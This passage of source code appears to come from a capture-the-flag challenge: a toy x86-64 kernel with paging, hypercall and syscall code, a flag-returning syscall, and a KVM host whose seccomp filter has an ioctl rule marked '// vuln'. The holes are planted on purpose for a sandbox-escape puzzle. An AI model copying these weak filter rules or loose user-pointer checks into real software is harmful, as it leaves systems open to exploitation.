96 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 97 | uint64_t mappable = 0; 98 | 99 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 100 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 101 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)) 102 | return 0; // user_page must in 0x0000000000 ~ 0x7fffffffff 103 | 104 | pdpt_phys = pml4[idx[0]] & ~0xfff; 105 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 106 | if(!(pdpt[idx[1]] & PDE64_PRESENT)){ 107 | mappable = ((idx[1]+1)<<30) - vaddr; 108 | goto next; 109 | } 110 | if(!(pdpt[idx[1]] & PDE64_USER)) 111 | return 0; 112 | 113 | pd_phys = pdpt[idx[1]] & ~0xfff; 114 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 115 | if(!(pd[idx[2]] & PDE64_PRESENT)){ 116 | mappable = ((idx[2]+1)<<21) - vaddr; 117 | goto next; 118 | } 119 | if(!(pd[idx[2]] & PDE64_USER)) 120 | return 0; 121 | 122 | uint16_t pages = 
length>>12; 123 | if(pages > 512-idx[3]) 124 | pages = 512-idx[3]; 125 | 126 | pt_phys = pd[idx[2]] & ~0xfff; 127 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 128 | for(int i = 0; i < pages; i++){ 129 | if(pt[idx[3]+i] & PDE64_PRESENT) 130 | goto end; 131 | mappable += 1<<12; 132 | } 133 | 134 | next: 135 | if(mappable < length) 136 | mappable += mappable_size(vaddr+mappable, length-mappable); 137 | 138 | end: 139 | return mappable; 140 | } 141 | 142 | static uint64_t do_mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot){ 143 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 144 | uint64_t *pml4, *pdpt, *pd, *pt; 145 | 146 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 147 | uint64_t ret = -1; 148 | 149 | uint16_t pages = length>>12; 150 | uint16_t remain = 0; 151 | if(pages > 512-idx[3]){ 152 | remain = pages - (512-idx[3]); 153 | pages = 512-idx[3]; 154 | } 155 | 156 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 157 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 158 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)){ 159 | ret= -1; // user_page must in 0x0000000000 ~ 0x7fffffffff 160 | goto end; 161 | } 162 | 163 | pdpt_phys = pml4[idx[0]] & ~0xfff; 164 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 165 | if(!(pdpt[idx[1]] & PDE64_PRESENT)) 166 | goto new_pd; 167 | if(!(pdpt[idx[1]] & PDE64_USER)){ 168 | ret= -1; 169 | goto end; 170 | } 171 | 172 | pd_phys = pdpt[idx[1]] & ~0xfff; 173 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 174 | if(!(pd[idx[2]] & PDE64_PRESENT)) 175 | goto new_pt; 176 | if(!(pd[idx[2]] & PDE64_USER)){ 177 | ret= -1; 178 | goto end; 179 | } 180 | 181 | pt_phys = pd[idx[2]] & ~0xfff; 182 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 183 | for(int i = 0; i < pages; i++) 184 | if(pt[idx[3]+i] & PDE64_PRESENT){ 185 | ret= -1; 186 | goto end; 187 | } 188 | goto new_page; 189 | 190 | new_pd: 191 | if((pd_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 192 | return -1; 193 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 194 | pdpt[idx[1]] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_phys; 195 | 196 | new_pt: 197 | if((pt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 198 | return -1; 199 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 200 | pd[idx[2]] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pt_phys; 201 | 202 | new_page: 203 | for(int i = 0; i < pages; i++) 204 | pt[idx[3]+i] = PDE64_PRESENT | (prot & PROT_WRITE ? PDE64_RW : 0) | \ 205 | (prot & (PROT_READ | PROT_WRITE) ? 
PDE64_USER : 0) | (paddr+(i<<12)); 206 | 207 | if(remain > 0) 208 | if(do_mmap_in_user(vaddr+(pages<<12), paddr+(pages<<12), remain<<12, prot) != vaddr+(pages<<12)){ 209 | for(int i = 0; i < pages; i++) 210 | pt[idx[3]+i] = 0; 211 | return -1; 212 | } 213 | 214 | if(vaddr+(pages<<12) == map_bottom) 215 | map_bottom = vaddr; 216 | ret = vaddr; 217 | end: 218 | return ret; 219 | } 220 | 221 | uint64_t mprotect_user(uint64_t vaddr, size_t length, int prot){ 222 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 223 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 224 | uint64_t *pml4, *pdpt, *pd, *pt; 225 | 226 | if(vaddr&0xfff || length&0xfff) 227 | return -1; 228 | 229 | uint16_t pages = length>>12; 230 | uint16_t remain = 0; 231 | if(pages > 512-idx[3]){ 232 | remain = pages - (512-idx[3]); 233 | pages = 512-idx[3]; 234 | } 235 | 236 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 237 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 238 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)) 239 | return -1; 240 | 241 | pdpt_phys = pml4[idx[0]] & ~0xfff; 242 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 243 | if(!(pdpt[idx[1]] & PDE64_PRESENT) || !(pdpt[idx[1]] & PDE64_USER)) 244 | return -1; 245 | 246 | pd_phys = pdpt[idx[1]] & ~0xfff; 247 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 248 | if(!(pd[idx[2]] & PDE64_PRESENT) || !(pd[idx[2]] & PDE64_USER)) 249 | return -1; 250 | 251 | pt_phys = pd[idx[2]] & ~0xfff; 252 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 253 | for(int i = 0; i < pages; i++) 254 | if(!(pt[idx[3]+i] & PDE64_PRESENT)) 255 | return -1; 256 | 257 | for(int i = 0; i < pages; i++){ 258 | uint64_t page_phys = pt[idx[3]+i] & ~((1<<9)-1); 259 | 260 | pt[idx[3]+i] = PDE64_PRESENT | (prot & PROT_WRITE ? PDE64_RW : 0) | \ 261 | (prot & (PROT_READ | PROT_WRITE) ? 
PDE64_USER : 0) | page_phys; 262 | } 263 | 264 | if(remain > 0) 265 | if(mprotect_user(vaddr+(pages<<12), remain<<12, prot) == -1) 266 | return -1; 267 | 268 | return 0; 269 | } 270 | 271 | uint64_t munmap_user(uint64_t vaddr, size_t length){ 272 | uint16_t idx[] = { (vaddr>>39) & 0x1ff, (vaddr>>30) & 0x1ff, (vaddr>>21) & 0x1ff, (vaddr>>12) & 0x1ff }; 273 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 274 | uint64_t *pml4, *pdpt, *pd, *pt; 275 | 276 | if(vaddr&0xfff || length&0xfff) 277 | return -1; 278 | 279 | uint16_t pages = length>>12; 280 | uint16_t remain = 0; 281 | if(pages > 512-idx[3]){ 282 | remain = pages - (512-idx[3]); 283 | pages = 512-idx[3]; 284 | } 285 | 286 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 287 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 288 | if(!(pml4[idx[0]] & PDE64_PRESENT) || !(pml4[idx[0]] & PDE64_USER)) 289 | return -1; 290 | 291 | pdpt_phys = pml4[idx[0]] & ~0xfff; 292 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 293 | if(!(pdpt[idx[1]] & PDE64_PRESENT) || !(pdpt[idx[1]] & PDE64_USER)) 294 | return -1; 295 | 296 | pd_phys = pdpt[idx[1]] & ~0xfff; 297 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 298 | if(!(pd[idx[2]] & PDE64_PRESENT) || !(pd[idx[2]] & PDE64_USER)) 299 | return -1; 300 | 301 | pt_phys = pd[idx[2]] & ~0xfff; 302 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 303 | for(int i = 0; i < pages; i++) 304 | if(!(pt[idx[3]+i] & PDE64_PRESENT)) 305 | return -1; 306 | 307 | for(int i = 0; i < pages; i++){ 308 | uint64_t page_phys = pt[idx[3]+i] & ~((1<<9)-1); 309 | hc_free((void*)page_phys, 0x1000); 310 | 311 | pt[idx[3]+i] = 0; 312 | } 313 | 314 | if(remain > 0) 315 | if(munmap_user(vaddr+(pages<<12), remain<<12) == -1) 316 | return -1; 317 | 318 | if(vaddr == map_bottom) 319 | map_bottom += length; 320 | 321 | return 0; 322 | } 323 | -------------------------------------------------------------------------------- /kernel/memory/usermem.h: -------------------------------------------------------------------------------- 1 | #ifndef _USERMEM_H 2 | #define _USERMEM_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #define copy_to_user(dst, src, size) (((dst) < (1UL<<39)-1) ? (uint64_t)memcpy((void*)dst, src, size) : -1) 9 | #define copy_from_user(dst, src, size) (((src) < (1UL<<39)-1) ? 
memcpy(dst, (void*)src, size) : (void*)-1) 10 | 11 | uint64_t brk; 12 | 13 | int prepare_user(void); 14 | uint64_t mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot); 15 | uint64_t mmap_user(uint64_t vaddr, size_t length, int prot); 16 | uint64_t mprotect_user(uint64_t vaddr, size_t length, int prot); 17 | uint64_t munmap_user(uint64_t vaddr, size_t length); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /kernel/service/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := service.a 2 | 3 | include ../template.mk 4 | 5 | ifndef CTF_FLAG1 6 | CTF_FLAG1 := XXXXX{1111111111111111111111111111111} 7 | endif 8 | 9 | syscall.o: syscall.c 10 | $(CC) $(CFLAGS) -c -MMD -MP $< -DFLAG1=\"$(CTF_FLAG1)\" 11 | -------------------------------------------------------------------------------- /kernel/service/hypercall.h: -------------------------------------------------------------------------------- 1 | #ifndef _HYPERCALL_H 2 | #define _HYPERCALL_H 3 | 4 | unsigned int hc_read(void *buf, unsigned long size, int user); 5 | unsigned int hc_write(void *buf, unsigned long size, int user); 6 | 7 | unsigned int hc_mem_inuse(void); 8 | unsigned int hc_mem_total(void); 9 | void *hc_malloc(void *addr, unsigned long size); 10 | int hc_free(void *addr, unsigned long size); 11 | 12 | void *hc_load_module(void *addr, unsigned long offset, unsigned long size); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /kernel/service/hypercall.s: -------------------------------------------------------------------------------- 1 | global hc_read, hc_write 2 | global hc_mem_inuse, hc_mem_total, hc_malloc, hc_free 3 | global hc_load_module 4 | 5 | hc_read: 6 | mov rax, 0x10 7 | mov rbx, rdi 8 | mov rcx, rsi 9 | vmmcall 10 | ret 11 | 12 | hc_write: 13 | mov rax, 0x11 14 | mov rbx, rdi 15 | mov rcx, rsi 16 | vmmcall 17 | ret 18 | 19 | hc_mem_total: 20 | mov rax, 0x20 21 | mov rbx, 1 22 | vmmcall 23 | ret 24 | 25 | hc_mem_inuse: 26 | mov rax, 0x20 27 | mov rbx, 2 28 | vmmcall 29 | ret 30 | 31 | hc_malloc: 32 | mov rax, 0x21 33 | mov rbx, rdi 34 | mov rcx, rsi 35 | vmmcall 36 | ret 37 | 38 | hc_free: 39 | mov rax, 0x22 40 | mov rbx, rdi 41 | mov rcx, rsi 42 | vmmcall 43 | ret 44 | 45 | hc_load_module: 46 | mov rax, 0x30 47 | mov rbx, 1 48 | mov rcx, rdi 49 | xchg rdx, rsi 50 | vmmcall 51 | ret 52 | -------------------------------------------------------------------------------- /kernel/service/switch.h: -------------------------------------------------------------------------------- 1 | #ifndef _SWITCH_H 2 | #define _SWITCH_H 3 | 4 | void set_handler(void* func); 5 | void switch_user(uint64_t rip, uint64_t rsp); 6 | void syscall_handler(void); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /kernel/service/switch.s: -------------------------------------------------------------------------------- 1 | global set_handler, switch_user, syscall_handler 2 | extern syscall 3 | extern kernel_stack 4 | 5 | set_handler: 6 | xor rax, rax 7 | mov rdx, 0x00200010 8 | mov ecx, 0xc0000081 9 | wrmsr 10 | 11 | mov rax, rdi 12 | mov rdx, 0x80 13 | mov ecx, 0xc0000082 14 | wrmsr 15 | 16 | ret 17 | 18 | switch_user: 19 | cli 20 | mov [rel + kernel_stack], rsp 21 | mov ax, 0x2b 22 | mov ds, eax 23 | push 0x2b ; ss 24 | push rsi ; stack 25 | pushfq ; rflags 26 | or qword [rsp], 0x200 27 | push 0x23 ; cs 28 | push rdi ; rip 29 | 
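	; editor's note: clear every general-purpose register before iretq so that no
	; kernel-mode values are carried into ring 3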
xor rax, rax 30 | xor rcx, rcx 31 | xor rdx, rdx 32 | xor rbx, rbx 33 | xor rsi, rsi 34 | xor rdi, rdi 35 | xor rbp, rbp 36 | xor r8, r8 37 | xor r9, r9 38 | xor r10, r10 39 | xor r11, r11 40 | xor r12, r12 41 | xor r13, r13 42 | xor r14, r14 43 | xor r15, r15 44 | iretq 45 | 46 | syscall_handler: 47 | mov r12, rsp 48 | mov rsp, [rel + kernel_stack] 49 | 50 | push rax 51 | call get_usercs 52 | mov r13, rax 53 | pop rax 54 | 55 | push r13 ; ss 56 | push r12 ; rsp 57 | push r11 ; rflags 58 | push r13 ; cs 59 | push rcx ; rip 60 | 61 | add word [rsp+0x8], 3 ; cs 62 | add word [rsp+0x20], 0xb ; ss 63 | 64 | push rbx 65 | push rsi 66 | push rdi 67 | push rbp 68 | mov rbp, rsp 69 | 70 | push r9 71 | push r8 72 | push r10 73 | push rdx 74 | push rsi 75 | push rdi 76 | mov rsi, rsp 77 | mov rdi, rax 78 | 79 | mov bx, ds 80 | push bx 81 | mov bx, ss 82 | mov ds, bx 83 | 84 | call syscall 85 | 86 | pop bx 87 | mov ds, bx 88 | 89 | leave 90 | pop rdi 91 | pop rsi 92 | pop rbx 93 | iretq 94 | 95 | get_usercs: 96 | push rcx 97 | push rdx 98 | mov ecx, 0xc0000081 99 | rdmsr 100 | shr edx, 0x10 101 | mov rax, rdx 102 | pop rdx 103 | pop rcx 104 | ret 105 | -------------------------------------------------------------------------------- /kernel/service/syscall.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "service/hypercall.h" 6 | #include "memory/usermem.h" 7 | #include "utils/misc.h" 8 | 9 | #define NR_read 0 10 | #define NR_write 1 11 | 12 | #define NR_mmap 9 13 | #define NR_mprotect 10 14 | #define NR_munmap 11 15 | #define NR_brk 12 16 | 17 | #define NR_exit 60 18 | 19 | #define NR_getflag 4296 20 | 21 | ssize_t sys_read(int fd, uint64_t buf, size_t count); 22 | ssize_t sys_write(int fd, uint64_t buf, size_t count); 23 | uint64_t sys_mmap(uint64_t addr, size_t length, int prot, int flags, int fd, off_t offset); 24 | uint64_t sys_mprotect(uint64_t addr, size_t length, int prot); 25 | int sys_munmap(uint64_t addr, size_t length); 26 | int sys_brk(uint64_t addr); 27 | void sys_exit(int status); 28 | uint64_t sys_getflag(void); 29 | 30 | uint64_t syscall(uint64_t nr, uint64_t argv[]){ 31 | uint64_t ret = -1; 32 | 33 | switch(nr){ 34 | case NR_read: 35 | ret = sys_read(argv[0], argv[1], argv[2]); 36 | break; 37 | case NR_write: 38 | ret = sys_write(argv[0], argv[1], argv[2]); 39 | break; 40 | case NR_mmap: 41 | ret = sys_mmap(argv[0], argv[1], argv[2], argv[3], argv[4], argv[5]); 42 | break; 43 | case NR_mprotect: 44 | ret = sys_mprotect(argv[0], argv[1], argv[2]); 45 | break; 46 | case NR_munmap: 47 | ret = sys_munmap(argv[0], argv[1]); 48 | break; 49 | case NR_brk: 50 | ret = sys_brk(argv[0]); 51 | break; 52 | case NR_exit: 53 | sys_exit(argv[0]); 54 | break; 55 | case NR_getflag: 56 | ret = sys_getflag(); 57 | break; 58 | } 59 | 60 | return ret; 61 | } 62 | 63 | ssize_t sys_read(int fd, uint64_t buf, size_t count){ 64 | return hc_read((void*)buf, count, 1); 65 | } 66 | 67 | ssize_t sys_write(int fd, uint64_t buf, size_t count){ 68 | return hc_write((void*)buf, count, 1); 69 | } 70 | 71 | uint64_t sys_mmap(uint64_t addr, size_t length, int prot, int flags, int fd, off_t offset){ 72 | return mmap_user(addr, length, prot); 73 | } 74 | 75 | uint64_t sys_mprotect(uint64_t addr, size_t length, int prot){ 76 | return mprotect_user(addr, length, prot); 77 | } 78 | 79 | int sys_munmap(uint64_t addr, size_t length){ 80 | return munmap_user(addr, length); 81 | } 82 | 83 | int sys_brk(uint64_t addr){ 84 | 
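	/* editor's note: brk(0) reports the current break; a larger address maps the
	   gap [brk, addr) read/write, a smaller one unmaps [addr, brk) */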
if(!addr) 85 | return brk; 86 | 87 | if(addr > brk){ 88 | if(mmap_user(brk, addr-brk, PROT_READ | PROT_WRITE) < 0) 89 | return -1; 90 | } 91 | else{ 92 | if(munmap_user(addr, brk-addr) < 0) 93 | return -1; 94 | } 95 | 96 | brk = addr; 97 | return 0; 98 | } 99 | 100 | void sys_exit(int status){ 101 | hlt(); 102 | } 103 | 104 | uint64_t sys_getflag(void){ 105 | uint64_t addr; 106 | char flag[] = "Here is first flag : "FLAG1; 107 | 108 | addr = mmap_user(0, 0x1000, PROT_WRITE); 109 | copy_to_user(addr, flag, sizeof(flag)); 110 | mprotect_user(addr, 0x1000, PROT_NONE); 111 | 112 | return addr; 113 | } 114 | -------------------------------------------------------------------------------- /kernel/startup.s: -------------------------------------------------------------------------------- 1 | global _start, hlt 2 | extern kernel_main, kernel_stack 3 | 4 | _start: 5 | mov rax, 0x21 6 | mov rbx, 0 7 | mov rcx, 0x4000 8 | vmmcall 9 | 10 | mov rsp, rax 11 | add rsp, 0x4000 12 | mov [rel + kernel_stack], rsp 13 | call kernel_main 14 | 15 | hlt: 16 | hlt 17 | jmp hlt 18 | -------------------------------------------------------------------------------- /kernel/template.mk: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | CSRCS := $(wildcard *.c) 4 | SSRCS := $(wildcard *.s) 5 | OBJS := $(SSRCS:.s=.o) $(CSRCS:.c=.o) 6 | DEPS := $(CSRCS:.c=.d) 7 | 8 | ifndef CFLAGS 9 | CFLAGS := -Wall -I.. -masm=intel -fPIE -g3 10 | endif 11 | 12 | .PHONY: all 13 | all: $(TARGET) 14 | 15 | -include $(DEPS) 16 | 17 | $(TARGET): $(OBJS) 18 | $(AR) rcs $@ $^ 19 | 20 | %.o: %.c 21 | $(CC) $(CFLAGS) -c -MMD -MP $< 22 | 23 | %.o: %.s 24 | $(AS) -f elf64 $^ 25 | 26 | .PHONY: clean 27 | clean: 28 | $(RM) $(DEPS) $(OBJS) $(TARGET) 29 | -------------------------------------------------------------------------------- /kernel/utils/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := utils.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kernel/utils/misc.h: -------------------------------------------------------------------------------- 1 | #ifndef _MISC_H 2 | #define _MISC_H 3 | 4 | void *memcpy(void *dest, const void *src, size_t n); 5 | void *memset(void *dest, const int c, size_t n); 6 | size_t strlen(const char *s); 7 | void hlt(void) __attribute__((noreturn)) ; 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /kernel/utils/misc.s: -------------------------------------------------------------------------------- 1 | global memcpy, memset, strlen 2 | 3 | memcpy: 4 | mov rcx, rdx 5 | lc: 6 | mov al, [rsi] 7 | mov [rdi], al 8 | inc rdi 9 | inc rsi 10 | loop lc 11 | mov rax, rdi 12 | sub rax, rdx 13 | ret 14 | 15 | memset: 16 | mov rcx, rdx 17 | ls: 18 | mov [rdi], sil 19 | inc rdi 20 | loop ls 21 | mov rax, rdi 22 | sub rax, rdx 23 | ret 24 | 25 | strlen: 26 | xor rcx, rcx 27 | ll: 28 | mov al, [rdi+rcx] 29 | inc rcx 30 | test al, al 31 | jne ll 32 | lea rax, [rcx-1] 33 | ret 34 | -------------------------------------------------------------------------------- /kvm/.gitignore: -------------------------------------------------------------------------------- 1 | .* 2 | !.gitignore 3 | 4 | *.txt 5 | *.swp 6 | 7 | *.elf 8 | *.bin 9 | *.a 10 | *.o 11 | *.d 12 | -------------------------------------------------------------------------------- /kvm/Makefile: 
-------------------------------------------------------------------------------- 1 | TARGET := kvm.elf 2 | SRCS := main.c 3 | 4 | OBJS := $(SRCS:.c=.o) 5 | DEPS := $(SRCS:.c=.d) 6 | SUB_OBJS := vm/vm.a utils/utils.a 7 | CFLAGS := -Wall -Wl,-z,relro,-z,now -fstack-protector -I.. -g3 8 | 9 | export CFLAGS 10 | 11 | .PHONY: all 12 | all: $(TARGET) 13 | 14 | $(TARGET): $(OBJS) $(SUB_OBJS) 15 | $(CC) $^ -o $@ 16 | 17 | %.o: %.c 18 | $(CC) $(CFLAGS) -c -MMD -MP $< 19 | 20 | $(SUB_OBJS): FORCE 21 | $(MAKE) -C $(dir $@) $(notdir $@) 22 | 23 | .PHONY: clean 24 | clean: 25 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 26 | $(RM) $(DEPS) $(OBJS) $(TARGET) 27 | 28 | FORCE: 29 | -------------------------------------------------------------------------------- /kvm/bits.h: -------------------------------------------------------------------------------- 1 | #ifndef _BITS_H 2 | #define _BITS_H 3 | 4 | /* CR0 bits */ 5 | #define CR0_PE 1u 6 | #define CR0_MP (1U << 1) 7 | #define CR0_EM (1U << 2) 8 | #define CR0_TS (1U << 3) 9 | #define CR0_ET (1U << 4) 10 | #define CR0_NE (1U << 5) 11 | #define CR0_WP (1U << 16) 12 | #define CR0_AM (1U << 18) 13 | #define CR0_NW (1U << 29) 14 | #define CR0_CD (1U << 30) 15 | #define CR0_PG (1U << 31) 16 | 17 | /* CR4 bits */ 18 | #define CR4_VME 1 19 | #define CR4_PVI (1U << 1) 20 | #define CR4_TSD (1U << 2) 21 | #define CR4_DE (1U << 3) 22 | #define CR4_PSE (1U << 4) 23 | #define CR4_PAE (1U << 5) 24 | #define CR4_MCE (1U << 6) 25 | #define CR4_PGE (1U << 7) 26 | #define CR4_PCE (1U << 8) 27 | #define CR4_OSFXSR (1U << 8) 28 | #define CR4_OSXMMEXCPT (1U << 10) 29 | #define CR4_UMIP (1U << 11) 30 | #define CR4_VMXE (1U << 13) 31 | #define CR4_SMXE (1U << 14) 32 | #define CR4_FSGSBASE (1U << 16) 33 | #define CR4_PCIDE (1U << 17) 34 | #define CR4_OSXSAVE (1U << 18) 35 | #define CR4_SMEP (1U << 20) 36 | #define CR4_SMAP (1U << 21) 37 | 38 | #define EFER_SCE 1 39 | #define EFER_LME (1U << 8) 40 | #define EFER_LMA (1U << 10) 41 | #define EFER_NXE (1U << 11) 42 | 43 | /* 64-bit page * entry bits */ 44 | #define PDE64_PRESENT 1 45 | #define PDE64_RW (1U << 1) 46 | #define PDE64_USER (1U << 2) 47 | #define PDE64_ACCESSED (1U << 5) 48 | #define PDE64_DIRTY (1U << 6) 49 | #define PDE64_PS (1U << 7) 50 | #define PDE64_G (1U << 8) 51 | #define PDE64_NX (1UL << 63) 52 | 53 | #endif 54 | -------------------------------------------------------------------------------- /kvm/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "vm/vm.h" 5 | #include "utils/module.h" 6 | 7 | #define GUEST_MEMSIZE 0x400000 8 | 9 | __attribute__((constructor)) 10 | void init(void){ 11 | setbuf(stdout, NULL); 12 | } 13 | 14 | static int set_seccomp(int maxfd); 15 | 16 | int main(int argc, char *argv[]){ 17 | struct vm *vm; 18 | unsigned long entry; 19 | int nmod; 20 | char **mods; 21 | int fds; 22 | 23 | if((fds = open("/dev/null", O_RDONLY)) < 0) 24 | fds = 3; 25 | else 26 | close(fds); 27 | 28 | if(argc < 2){ 29 | char *arg[] = {"kernel.bin"}; 30 | nmod = 1; 31 | mods = arg; 32 | } 33 | else { 34 | nmod = argc-1; 35 | mods = argv+1; 36 | } 37 | init_modules(nmod, mods); 38 | 39 | if(!(vm = init_vm(1, GUEST_MEMSIZE))) 40 | return -1; 41 | if((entry = load_kernel(vm)) & 0xfff) 42 | return -1; 43 | 44 | if(set_seccomp(fds+nmod+3)) 45 | return -1; 46 | 47 | run_vm(vm, 0, entry); 48 | 49 | fini_modules(); 50 | return 0; 51 | } 52 | 53 | #include 54 | #include 55 | #include 56 | #include 57 | #include 58 | #include 59 | 60 | 
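/*
 * Editor's note -- behaviour read from the BPF program below, not part of the
 * original source: non-x86-64 and x32 syscalls are killed; read, write, close,
 * lseek, brk and exit_group are always allowed; ioctl is killed for
 * KVM_CREATE_VM and KVM_CREATE_VCPU and otherwise allowed whenever the fd
 * argument masked with 0xff is below maxfd. The ioctl branch is the one the
 * author tagged "// vuln".
 */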
static int set_seccomp(int maxfd){ 61 | struct sock_filter filter[] = { 62 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))), 63 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0), 64 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 65 | 66 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), 67 | 68 | BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, __X32_SYSCALL_BIT, 0, 1), 69 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 70 | 71 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_read, 0, 1), 72 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 73 | 74 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_write, 0, 1), 75 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 76 | 77 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_close, 0, 1), 78 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 79 | 80 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_lseek, 0, 1), 81 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 82 | 83 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_brk, 0, 1), 84 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 85 | 86 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_exit_group, 0, 1), 87 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 88 | 89 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ioctl, 0, 1), // vuln 90 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, args[1]))), 91 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, KVM_CREATE_VM, 5, 0), 92 | BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, KVM_CREATE_VCPU, 4, 0), 93 | BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, args[0]))), 94 | BPF_STMT(BPF_ALU | BPF_AND | BPF_K, 0xff), 95 | BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, maxfd, 1, 0), 96 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW), 97 | 98 | BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL), 99 | }; 100 | 101 | struct sock_fprog prog = { 102 | .len = (unsigned short) (sizeof(filter) / sizeof(struct sock_filter)), 103 | .filter = filter, 104 | }; 105 | 106 | if(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) { 107 | perror("prctl PR_SET_NO_NEW_PRIVS"); 108 | return -1; 109 | } 110 | 111 | if(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)){ 112 | perror("prctl PR_SET_SECCOMP"); 113 | return -1; 114 | } 115 | 116 | return 0; 117 | } 118 | -------------------------------------------------------------------------------- /kvm/template.mk: -------------------------------------------------------------------------------- 1 | SRCS := $(wildcard *.c) 2 | OBJS := $(SRCS:.c=.o) 3 | DEPS := $(SRCS:.c=.d) 4 | 5 | ifndef CFLAGS 6 | CFLAGS := -Wall -L.. -g3 7 | endif 8 | 9 | .PHONY: all 10 | all: $(TARGET) 11 | 12 | -include $(DEPS) 13 | 14 | $(TARGET): $(OBJS) 15 | $(AR) rcs $@ $^ 16 | 17 | %.o: %.c 18 | $(CC) $(CFLAGS) -c -MMD -MP $< 19 | 20 | .PHONY: clean 21 | clean: 22 | $(RM) $(DEPS) $(OBJS) $(TARGET) 23 | -------------------------------------------------------------------------------- /kvm/utils/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := utils.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kvm/utils/debug.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define DEBUG_PRINT(...) 
